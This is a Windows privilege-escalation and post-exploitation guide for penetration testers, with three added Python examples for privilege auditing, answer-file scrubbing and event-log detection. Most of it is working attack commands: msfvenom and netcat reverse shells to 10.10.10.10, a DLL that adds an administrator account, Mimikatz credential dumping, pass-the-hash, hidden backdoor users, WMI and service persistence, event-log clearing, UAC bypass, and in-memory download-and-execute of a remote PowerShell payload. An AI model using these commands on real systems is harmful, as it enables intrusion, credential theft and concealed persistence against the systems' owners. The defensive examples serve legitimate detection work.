This guide provides a systematic approach to Windows privilege escalation, covering manual enumeration, automated tools, common vulnerabilities, and exploitation techniques used in real-world penetration testing scenarios.

  1. Windows Privilege Levels
  2. Information Gathering
  3. Automated Enumeration Tools
  4. Common Privilege Escalation Vectors
  5. Quick Wins
  6. Post-Exploitation
  7. Maintaining Access
  8. Defense Evasion
  9. Tool Usage Examples

Windows Privilege Levels

Understanding Windows privilege levels is crucial for privilege escalation:

  • Administrator (local) - Highest privileges on the local system
  • Standard (local) - Limited access users, cannot make permanent system changes
  • Guest - Access to the system for people who have no user account of their own
  • Standard (domain) - Standard users within Active Directory, might have local admin rights
  • Administrator (domain) - Highest privileges, can manage domain users
  • SYSTEM (LocalSystem) - Not an interactive user account; the identity Windows services and internal tasks run as. Highest privilege level on the local machine

Information Gathering

User Enumeration

Essential commands for understanding user context:

 
# Current user information
whoami
whoami /priv         # Current user privileges
whoami /groups       # Group memberships
whoami /all          # Complete token information
 
 
# System users
net users            # List all users
net user username    # Details about specific user
qwinsta              # Logged in users
query user           # Alternative for logged users
 
 
# Groups
net localgroup       # List all groups
net localgroup groupname    # Members of specific group
net localgroup administrators    # Admin group members

System Information

Gather comprehensive system details:

 
# Operating system information
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"    # OS details only
systeminfo | findstr /B /C:"System Type"                # Architecture
 
 
# Environment variables
set                  # All environment variables
echo %PATH%          # PATH variable
echo %USERNAME%      # Current username
echo %COMPUTERNAME%  # Computer name
 
 
# PowerShell alternatives
Get-ComputerInfo
$env:computername
[System.Environment]::OSVersion.Version

Network Connections

Identify network services and connections:

 
# Network configuration
ipconfig /all        # Full network configuration
route print          # Routing table
arp -a              # ARP cache
 
 
# Active connections
netstat -ano        # All connections with PIDs
netstat -anob       # With executable names (requires admin)
netstat -an | findstr LISTENING    # Listening ports
 
 
# Firewall rules
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

Service Enumeration

Services often run with elevated privileges:

 
# Service listing
sc query            # Running services
sc queryex type= service state= all    # All services, including stopped ones (note the space after each '=')
wmic service list brief    # Brief service list
wmic service get name,displayname,pathname,startmode,startname
 
 
# Specific service details
sc qc servicename   # Configuration details
sc query servicename    # Service status

Scheduled Tasks

Tasks running with elevated privileges can be exploited:

 
# List all scheduled tasks
schtasks /query /fo LIST /v
 
 
# PowerShell alternative
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
 
 
# Check specific task
schtasks /query /tn taskname /fo LIST /v

File and Directory Permissions

Find writable directories and files:

 
# Find writable directories
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
 
 
# PowerShell - Find writable directories
Get-ChildItem "C:\Program Files" -Recurse -Directory -ErrorAction SilentlyContinue | Get-ACL | ?{($_.Access|?{$_.IdentityReference -match "Everyone"}).FileSystemRights -match "FullControl"}

Registry Enumeration

Search for credentials and configuration issues:

 
# Search for passwords in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
 
 
# AlwaysInstallElevated check
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
 
 
# AutoRun locations
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Patch Level

Identify missing security updates:

 
# List installed patches
wmic qfe list
wmic qfe get Caption,Description,HotFixID,InstalledOn
 
 
# PowerShell alternative
Get-HotFix | Sort-Object -Property InstalledOn -Descending

Installed Software

Vulnerable software can provide escalation paths:

 
# List installed programs (wmic product triggers a consistency check of every MSI package: slow, and it writes MsiInstaller events to the Application log)
wmic product get name,version,vendor
wmic product where "name like '%java%'" get name,version
 
 
# Alternative methods (the Uninstall keys are faster and quieter; check both the native and the Wow6432Node hive)
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate

Driver Information

Outdated drivers are common privilege escalation vectors:

 
# List drivers
driverquery
driverquery /v    # Verbose output
driverquery /fo csv | findstr /i "kernel"    # Kernel drivers
 
 
# PowerShell (Get-WindowsDriver comes from the DISM module and needs an elevated shell)
Get-WindowsDriver -Online -All

Searching for Credentials

Look for stored credentials and sensitive files:

 
# Search for password strings in text and config files (/s recurses into subdirectories, /i ignores case)
findstr /si password *.txt *.xml *.config *.ini
 
 
# Common credential locations
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattended.xml
type C:\Windows\system32\sysprep\sysprep.xml
type C:\Windows\system32\sysprep\sysprep.inf
type C:\Windows\system32\sysprep\unattend.xml
type C:\Windows\system32\sysprep.inf
 
 
# PowerShell history
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
 
 
# Saved credentials
cmdkey /list

Automated Enumeration Tools

WinPEAS

WinPEAS is a comprehensive Windows enumeration script:

 
# Run WinPEAS (often detected by AV)
winpeas.exe
winpeas.exe > output.txt    # Redirect output to file
 
 
# Quiet mode with specific checks
winpeas.exe quiet cmd

PowerUp

PowerShell privilege escalation framework:

 
# Bypass execution policy
powershell.exe -nop -exec bypass
 
 
# Import and run PowerUp
Import-Module .\PowerUp.ps1
Invoke-AllChecks    # Run all checks
 
 
# Specific checks
Get-UnquotedService
Get-ModifiableServiceFile
Get-ModifiableService
Get-ServiceDetail

Windows Exploit Suggester

Runs on the attacker's machine, so only the systeminfo output has to be collected from the target:

 
# On target machine
systeminfo > systeminfo.txt
 
 
# On attacker machine
windows-exploit-suggester.py --update
windows-exploit-suggester.py --database 2023-10-15-mssb.xls --systeminfo systeminfo.txt
# Caveat: the MSSB spreadsheet this tool relies on stopped being updated when Microsoft retired
# security bulletins in 2017, so it knows nothing about newer patches; treat its output as a starting point only

Seatbelt

Comprehensive security auditing tool:

 
# Basic checks
Seatbelt.exe -group=all
 
 
# Specific checks
Seatbelt.exe -group=user
Seatbelt.exe -group=system
Seatbelt.exe -group=misc

Common Privilege Escalation Vectors

1. Unquoted Service Paths

When service paths contain spaces without quotes:

 
# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
 
 
# Check write permissions
icacls "C:\Program Files\Vulnerable Service\"
accesschk64.exe /accepteula -uwdq "C:\Program Files\Vulnerable Service\"
 
 
# Exploitation
 
# 1. Generate payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > malicious.exe
 
 
# 2. Place in the writable path component, named after the prefix Windows tries first
#    (for the path C:\Program Files\Vulnerable Service\svc.exe that is C:\Program Files\Vulnerable.exe)
copy malicious.exe "C:\Program Files\Vulnerable.exe"
 
 
# 3. Restart service
net stop servicename
net start servicename

2. Weak Service Permissions

Services with modifiable configurations:

 
# Find modifiable services
accesschk64.exe /accepteula -uwcqv "Authenticated Users" *
accesschk64.exe /accepteula -uwcqv "Everyone" *
 
 
# Check specific service
sc qc servicename
accesschk64.exe /accepteula -ucqv servicename
 
 
# Modify service binary path
sc config servicename binpath= "C:\temp\nc.exe -e cmd.exe 10.10.10.10 4444"
net stop servicename
net start servicename

3. DLL Hijacking

Applications loading DLLs from writable locations:

 
# Monitor DLL loading with ProcMon (requires admin on test system)
 
# Look for missing DLLs in writable directories
 
 
# Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > hijackme.dll
 
 
# Place in writable directory found by ProcMon
copy hijackme.dll "C:\Program Files\VulnerableApp\"
 
 
# Trigger by restarting service/application

Example C code for DLL:

#include <windows.h>
#include <stdlib.h>
 
BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            system("cmd.exe /c net user hacker Password123! /add");
            system("cmd.exe /c net localgroup administrators hacker /add");
            break;
    }
    return TRUE;
}

4. AlwaysInstallElevated

If both registry keys are set:

 
# Check if vulnerable
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
 
 
# Generate MSI payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o malicious.msi
 
 
# Execute MSI
msiexec /quiet /qn /i malicious.msi

5. Registry AutoRun

Writable autorun registry keys:

 
# Check permissions
accesschk64.exe /accepteula -uvwqk HKLM\Software\Microsoft\Windows\CurrentVersion\Run
accesschk64.exe /accepteula -uvwqk HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
 
 
# Add malicious entry
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\temp\backdoor.exe"

6. Scheduled Tasks

Writable scheduled task files:

 
# Find scheduled tasks
schtasks /query /fo LIST /v | findstr TaskName
schtasks /query /fo LIST /v | findstr /C:"Task To Run"    # /C: keeps the phrase together; without it findstr matches "Task", "To" or "Run" separately
 
 
# Check file permissions
icacls C:\Path\To\ScheduledTaskExecutable.exe
 
 
# Replace with malicious executable
move C:\Path\To\ScheduledTaskExecutable.exe C:\Path\To\ScheduledTaskExecutable.exe.bak
copy malicious.exe C:\Path\To\ScheduledTaskExecutable.exe

7. Token Impersonation

Exploiting SeImpersonate or SeAssignPrimaryToken privileges:

 
# Check current privileges
whoami /priv
 
 
# If SeImpersonate/SeAssignPrimaryToken is enabled:
 
# Use Juicy Potato (up to Windows Server 2016/Windows 10 1803)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID}
 
 
# Use PrintSpoofer (Windows Server 2019/Windows 10)
PrintSpoofer.exe -i -c cmd
 
 
# Use RoguePotato (Windows Server 2019/Windows 10)
RoguePotato.exe -r 10.10.10.10 -e "cmd.exe /c net user hacker Password123! /add"
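An added example (not from the guide) that parses the whoami /priv table and flags the privileges worth acting on. The sample output is constructed to match the command's layout on an English system; the list of privileges and the reasons given for them are the example's own. A privilege is reported whether its State is Enabled or Disabled, because a disabled privilege that is present in the token can be enabled by its holder at any time.

```python
"""Parse 'whoami /priv' output and flag escalation-relevant privileges (added example)."""

# Privileges a defender should not leave on ordinary or service accounts, and why.
# "Disabled" only means not currently enabled in the token; the holder can switch it
# on, so a privilege is reported whatever the State column says.
RISKY_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonate higher-privileged clients (the Potato family above)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process (same surface as SeImpersonate)",
    "SeDebugPrivilege": "read and write any process, LSASS included",
    "SeBackupPrivilege": "read any file regardless of its ACL, e.g. the SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
}

# Constructed output in the layout 'whoami /priv' prints on an English system.
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_whoami_priv(text: str) -> dict:
    """Return {privilege name: (description, state)}.

    The table starts after the '=====' ruler.  The description column contains
    single spaces, so each row is read as first token = name, last token =
    state, everything between = description; that is independent of column widths.
    """
    rows = {}
    in_table = False
    for line in text.splitlines():
        if not in_table:
            in_table = line.startswith("=")
            continue
        parts = line.split()
        if len(parts) < 3:
            continue
        rows[parts[0]] = (" ".join(parts[1:-1]), parts[-1])
    return rows


def risky_privileges(text: str) -> list:
    """Names of held privileges that appear in RISKY_PRIVILEGES, sorted, any state."""
    return sorted(name for name in parse_whoami_priv(text) if name in RISKY_PRIVILEGES)


def report(text: str) -> list:
    """One human-readable line per risky privilege, with its current state."""
    rows = parse_whoami_priv(text)
    return [f"{name} ({rows[name][1]}): {RISKY_PRIVILEGES[name]}" for name in risky_privileges(text)]


if __name__ == "__main__":
    # On a real host: whoami /priv > priv.txt, then pass that file's text instead of SAMPLE.
    for line in report(SAMPLE):
        print(line)
```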

8. Saved Credentials

Windows credential manager and RunAs:

 
# List saved credentials
cmdkey /list
 
 
# Use saved credentials
runas /savecred /user:admin cmd.exe
runas /savecred /user:DOMAIN\admin "cmd.exe /c nc.exe 10.10.10.10 4444 -e cmd.exe"

9. SAM and SYSTEM Files

If you can read SAM and SYSTEM:

 
# Check permissions
icacls C:\Windows\System32\config\SAM
icacls C:\Windows\System32\config\SYSTEM
 
 
# Copy files
copy C:\Windows\System32\config\SAM C:\temp\
copy C:\Windows\System32\config\SYSTEM C:\temp\
 
 
# Extract hashes offline
python3 secretsdump.py -sam SAM -system SYSTEM LOCAL

10. Pass the Hash

Using extracted NTLM hashes:

 
# Using pth-winexe
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 //10.10.10.10 cmd.exe
 
 
# Using Mimikatz
sekurlsa::pth /user:Administrator /domain:. /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0

Quick Wins

Common Passwords

Check for default or weak passwords:

 
# Common usernames to try
net user administrator
net user admin
net user guest
 
 
# Try common passwords
runas /user:administrator cmd
 
# Password123!, Welcome123!, Password1, Admin123

Unattended Installation Files

Often contain plaintext passwords:

 
# Check common locations
dir C:\Windows\Panther\Unattend.xml
dir C:\Windows\Panther\Unattended.xml
dir C:\Windows\system32\sysprep\unattend.xml
dir C:\Windows\system32\sysprep\sysprep.xml
 
 
# Search for answer files
dir /s /b C:\*.xml | findstr /i unattend
dir /s /b C:\*.txt | findstr /i password
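For this section and the Searching for Credentials section above: an added example, not code from the guide, that parses an answer file, reports every stored credential without printing it, and produces a scrubbed copy. The answer file itself is constructed; the element names (AutoLogon, AdministratorPassword, LocalAccount and their Password/Value/PlainText children) are the ones the Microsoft-Windows-Shell-Setup component uses.

```python
"""Find and scrub credentials left in Windows answer files (added example)."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

UNATTEND_NS = "urn:schemas-microsoft-com:unattend"
WCM_NS = "http://schemas.microsoft.com/WMIConfig/2002/State"

# Constructed answer file.  Values with <PlainText>false</PlainText> are not
# encrypted: Windows stores the UTF-16 password with the word "Password"
# appended, base64-encoded.  Nothing below decodes them; they are only reported.
SAMPLE_UNATTEND = """<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend"
          xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64"
               publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS">
      <AutoLogon>
        <Password>
          <Value>UABhAHMAcwB3AG8AcgBkADEAMgAzACEAUABhAHMAcwB3AG8AcgBkAA==</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <LogonCount>2</LogonCount>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>UABhAHMAcwB3AG8AcgBkADEAMgAzACEAUABhAHMAcwB3AG8AcgBkAA==</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount wcm:action="add">
            <Password>
              <Value>Welcome123!</Value>
              <PlainText>true</PlainText>
            </Password>
            <Group>Administrators</Group>
            <Name>svc_deploy</Name>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""


@dataclass
class Finding:
    setting: str     # AutoLogon, AdministratorPassword or LocalAccount
    account: str
    plaintext: bool  # True for <PlainText>true</PlainText>, else base64-obfuscated
    group: str = ""


def _local(tag: str) -> str:
    """Strip the namespace from an ElementTree tag ('{ns}Name' -> 'Name')."""
    return tag.rsplit("}", 1)[-1]


def _text(elem, name: str) -> str:
    """Text of the direct child called `name`, or '' if absent."""
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return ""


def _password_child(elem):
    """(value, plaintext flag) of the direct <Password> child, or None."""
    for child in elem:
        if _local(child.tag) == "Password":
            return _text(child, "Value"), _text(child, "PlainText").lower() == "true"
    return None


def audit_unattend(xml_text: str) -> list:
    """Report every stored credential in document order, without revealing it."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        kind = _local(elem.tag)
        if kind == "AutoLogon":
            pw = _password_child(elem)
            if pw and pw[0]:
                findings.append(Finding("AutoLogon", _text(elem, "Username"), pw[1]))
        elif kind == "AdministratorPassword":
            if _text(elem, "Value"):
                plain = _text(elem, "PlainText").lower() == "true"
                findings.append(Finding("AdministratorPassword", "Administrator", plain))
        elif kind == "LocalAccount":
            pw = _password_child(elem)
            if pw and pw[0]:
                findings.append(Finding("LocalAccount", _text(elem, "Name"), pw[1], _text(elem, "Group")))
    return findings


def scrub_unattend(xml_text: str) -> str:
    """Copy of the file with every password <Value> blanked, for files that must
    stay on disk.  Deleting the file after deployment is the better fix."""
    ET.register_namespace("", UNATTEND_NS)
    ET.register_namespace("wcm", WCM_NS)
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        if _local(elem.tag) in ("Password", "AdministratorPassword"):
            for child in elem:
                if _local(child.tag) == "Value":
                    child.text = ""
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for f in audit_unattend(SAMPLE_UNATTEND):
        how = "PLAINTEXT" if f.plaintext else "base64-obfuscated (not encrypted)"
        print(f"{f.setting}: account={f.account} group={f.group or '-'} password={how}")
```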

Configuration Files

Application configs may contain credentials:

 
# Web config files
findstr /si connectionString *.config
findstr /si password *.config
 
 
# Common application paths
dir C:\inetpub\wwwroot\web.config
dir C:\xampp\passwords.txt
dir C:\xampp\mysql\bin\my.ini

Post-Exploitation

Extracting Credentials

Using Mimikatz:

 
# Basic usage
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
lsadump::secrets
 
 
# From memory dump
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Using LaZagne:

 
# Extract all passwords
lazagne.exe all
 
 
# Specific modules
lazagne.exe browsers
lazagne.exe wifi
lazagne.exe windows

Persistence Techniques

1. Registry Persistence

 
# Run key persistence
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe" /f
 
 
# Scheduled task persistence
schtasks /create /sc minute /mo 5 /tn "Windows Update" /tr "C:\Windows\Temp\backdoor.exe" /ru SYSTEM

2. Service Persistence

 
# Create service
sc create BackdoorService binpath= "C:\Windows\Temp\backdoor.exe" start= auto
sc start BackdoorService
 
 
# Modify existing service
sc config "Vulnerable Service" binpath= "cmd.exe /c C:\Windows\Temp\backdoor.exe"

3. WMI Persistence

 
# WMI event subscription
$FilterArgs = @{name='BotFilter82';
                EventNameSpace='root\CIMv2';
                QueryLanguage="WQL";
                Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";}
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
 
$ConsumerArgs = @{name='BotConsumer23';
                CommandLineTemplate="C:\Windows\Temp\backdoor.exe";}
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
 
$FilterToConsumerArgs = @{
Filter = [Ref] $Filter;
Consumer = [Ref] $Consumer;}
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs

Covering Tracks

 
# Clear event logs
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
 
 
# Clear PowerShell history
Clear-History
Remove-Item (Get-PSReadlineOption).HistorySavePath
 
 
# Command history: cmd keeps it only in memory for the current session, and doskey /history merely prints it
doskey /history > nul

Maintaining Access

Creating Backdoor Users

 
# Create hidden user
net user hacker$ Password123! /add
net localgroup administrators hacker$ /add
net localgroup "Remote Desktop Users" hacker$ /add
 
 
# Hide from login screen
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker$ /t REG_DWORD /d 0 /f
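The other side of the Persistence, Covering Tracks and Creating Backdoor Users sections above: an added example (not from the guide) that runs simple detection rules over Windows event records. The events are constructed, with field names taken from the real events (Security 4720, 4732, 4698 and 1102; System 7045 and 104; Microsoft-Windows-WMI-Activity/Operational 5861). 4720 and 4732 need the User Account Management and Security Group Management audit subcategories enabled, 4698 needs Audit Other Object Access Events; the rest are logged by default. Changes to the Run keys only surface as Security 4657 when a SACL is set on the key, so they are not covered here.

```python
"""Detect the persistence, backdoor-account and log-clearing actions described
above from Windows event records (added example)."""
from dataclasses import dataclass

# Constructed records in the shape Get-WinEvent | ConvertTo-Json gives once the
# EventData fields are pulled into a dict.  Field names follow the real events;
# the values are invented for this example.
SAMPLE_EVENTS = [
    {"Channel": "Security", "EventID": 4720,
     "Data": {"TargetUserName": "hacker$", "SubjectUserName": "svc_web"}},
    {"Channel": "Security", "EventID": 4732,
     "Data": {"TargetUserName": "Administrators", "MemberSid": "S-1-5-21-1111-2222-3333-1105"}},
    {"Channel": "System", "EventID": 7045,
     "Data": {"ServiceName": "BackdoorService", "ImagePath": r"C:\Windows\Temp\backdoor.exe",
              "StartType": "auto start"}},
    {"Channel": "System", "EventID": 7045,
     "Data": {"ServiceName": "VendorAgent", "ImagePath": r"C:\Program Files\Vendor\agent.exe",
              "StartType": "auto start"}},
    {"Channel": "Security", "EventID": 4698,
     "Data": {"TaskName": "\\Windows Update",
              "TaskContent": "<Exec><Command>C:\\Windows\\Temp\\backdoor.exe</Command></Exec>"}},
    {"Channel": "Microsoft-Windows-WMI-Activity/Operational", "EventID": 5861,
     "Data": {"Consumer": 'CommandLineEventConsumer.Name="BotConsumer23"'}},
    {"Channel": "Security", "EventID": 1102, "Data": {"SubjectUserName": "svc_web"}},
    {"Channel": "System", "EventID": 104, "Data": {"Channel": "Security"}},
]

PRIVILEGED_GROUPS = {"administrators", "remote desktop users", "backup operators"}
# Locations a standard user can write to; a service or task launched from one of
# them deserves a ticket every time.
USER_WRITABLE_MARKERS = ("\\temp\\", "\\tasks\\", "\\users\\public\\", "\\appdata\\")


@dataclass
class Alert:
    rule: str
    event_id: int
    detail: str


def suspicious_path(path: str) -> bool:
    """True when a command line runs from a user-writable location or wraps the
    real payload in cmd.exe, as the sc config examples above do."""
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE_MARKERS) or "cmd.exe /c" in p


def detect(events) -> list:
    """Map each record to the technique it indicates; one Alert per hit."""
    alerts = []
    for ev in events:
        ch, eid, d = ev["Channel"], ev["EventID"], ev["Data"]
        if ch == "Security" and eid == 4720:
            alerts.append(Alert("account-created", eid,
                                f"{d['TargetUserName']} by {d['SubjectUserName']}"))
        elif ch == "Security" and eid == 4732 and d["TargetUserName"].lower() in PRIVILEGED_GROUPS:
            alerts.append(Alert("privileged-group-add", eid,
                                f"{d.get('MemberSid', '?')} -> {d['TargetUserName']}"))
        elif ch == "System" and eid == 7045 and suspicious_path(d["ImagePath"]):
            alerts.append(Alert("service-persistence", eid, f"{d['ServiceName']}: {d['ImagePath']}"))
        elif ch == "Security" and eid == 4698 and suspicious_path(d["TaskContent"]):
            alerts.append(Alert("task-persistence", eid, d["TaskName"]))
        elif ch.startswith("Microsoft-Windows-WMI-Activity") and eid == 5861:
            alerts.append(Alert("wmi-persistence", eid, d["Consumer"]))
        elif (ch, eid) in (("Security", 1102), ("System", 104)):
            alerts.append(Alert("log-cleared", eid, d.get("Channel", ch)))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.rule}] event {a.event_id}: {a.detail}")
```

The 7045 rule deliberately stays quiet for the vendor agent installed under Program Files: every new service is worth a log line, but only the ones started from a user-writable directory, or through cmd.exe, justify paging someone.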

Enable Remote Access

 
# Enable RDP
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
 
 
# Enable WinRM
winrm quickconfig -q
winrm set winrm/config/service/auth @{Basic="true"}
winrm set winrm/config/service @{AllowUnencrypted="true"}

Firewall Rules

 
# Add firewall exception
netsh advfirewall firewall add rule name="Backdoor" dir=in action=allow protocol=TCP localport=4444
 
 
# Disable firewall
netsh advfirewall set allprofiles state off

Defense Evasion

Bypassing UAC

 
# Using fodhelper
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe /c start C:\Windows\Temp\backdoor.exe" /f
fodhelper.exe
 
 
# Cleanup
reg delete HKCU\Software\Classes\ms-settings\ /f

Bypassing AppLocker

 
# Default writable directories bypassing AppLocker
C:\Windows\System32\spool\drivers\color\
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\Tasks\
C:\Windows\Temp\
 
 
# Using MSBuild
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml
 
 
# Using InstallUtil
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe

AV Evasion Techniques

 
# String obfuscation
$a = 'ams'; $b = 'iUtils'; iex "Import-Module $a$b"
 
 
# Base64 encoding
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('IEX(New-Object Net.WebClient).DownloadString("http://10.10.10.10/payload.ps1")'))
powershell.exe -EncodedCommand $encoded
 
 
# Download and execute in memory
IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/payload.ps1')

Tool Usage Examples

AccessChk

 
# Check user permissions on services
accesschk64.exe /accepteula -uwcqv "Authenticated Users" *
 
 
# Check file/folder permissions
accesschk64.exe /accepteula -uwdq C:\
accesschk64.exe /accepteula -uwdq "C:\Program Files\"
 
 
# Check registry permissions
accesschk64.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services

PowerShell One-Liners

 
# Find files owned by SYSTEM (Windows has no SUID bit; ownership is the nearest analogue)
Get-ChildItem -Path C:\ -Force -File -Recurse -ErrorAction SilentlyContinue | Get-Acl | Where-Object {$_.Owner -eq "NT AUTHORITY\SYSTEM"}
 
 
# Find folders with an ACE for Everyone (this also matches read-only entries; confirm the rights in the ACE before calling a folder writable)
Get-ChildItem -Path C:\ -Force -Directory -Recurse -ErrorAction SilentlyContinue | Get-Acl | Where-Object {$_.AccessToString -match "Everyone"}
 
 
# List all running processes with their owners (-IncludeUserName needs an elevated shell)
Get-Process -IncludeUserName | Select-Object ProcessName, UserName, Id
 
 
# Find installed patches
Get-HotFix | Sort-Object -Property InstalledOn -Descending | Select-Object HotFixID, InstalledOn, Description

Conclusion

Windows privilege escalation requires systematic enumeration, understanding of Windows security mechanisms, and knowledge of common misconfigurations. Always:

  1. Start with thorough enumeration
  2. Use automated tools to catch common issues
  3. Manually verify findings
  4. Document your path to privileges
  5. Maintain operational security

Remember that in real engagements, stealth and avoiding detection are crucial. Choose techniques based on the environment and security controls in place.